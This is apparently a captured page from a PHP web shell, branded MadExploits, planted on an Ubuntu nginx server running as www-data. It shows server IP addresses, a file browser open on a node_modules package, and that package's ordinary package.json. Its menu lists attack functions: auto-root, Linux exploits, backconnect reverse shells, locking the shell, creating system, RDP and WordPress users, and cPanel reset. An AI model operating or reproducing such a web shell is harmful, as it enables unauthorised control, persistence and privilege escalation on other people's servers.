Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
tryer /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
dr-xr-xr-x
src
[ DIR ]
dr-xr-xr-x
test
[ DIR ]
dr-xr-xr-x
.gitlab-ci.yml
361
B
-rw-rw-rw-
.jshintrc
1.27
KB
-rw-rw-rw-
.travis.yml
105
B
-rw-rw-rw-
AUTHORS
139
B
-rw-rw-rw-
CHANGES.md
1.1
KB
-rw-rw-rw-
COPYING
1.04
KB
-rw-rw-rw-
README.md
6.18
KB
-rw-rw-rw-
bower.json
224
B
-rw-rw-rw-
component.json
473
B
-rw-rw-rw-
package.json
1.05
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "tryer", "version": "1.0.1", "description": "Because everyone loves a tryer! Conditional and repeated task invocation for node and browser.", "homepage": "https://gitlab.com/philbooth/tryer", "bugs": "https://gitlab.com/philbooth/tryer/issues", "license": "MIT", "author": "Phil Booth <pmbooth@gmail.com> (https://philbooth.me/)", "main": "./src/tryer", "repository": { "type": "git", "url": "git+https://gitlab.com/philbooth/tryer.git" }, "keywords": [ "repeat", "retry", "predicate", "conditional", "invocation", "execution", "loop", "condition", "termination", "exponential", "backoff" ], "devDependencies": { "chai": "4.1.x", "jshint": "2.9.x", "mocha": "5.2.x", "please-release-me": "2.0.x", "spooks": "2.0.x", "uglify-js": "3.4.x" }, "scripts": { "lint": "jshint src/tryer.js test/unit.js", "test": "mocha --ui tdd --reporter spec --colors test/unit.js", "minify": "uglifyjs ./src/tryer.js --compress --mangle --output ./lib/tryer.min.js" } }
Close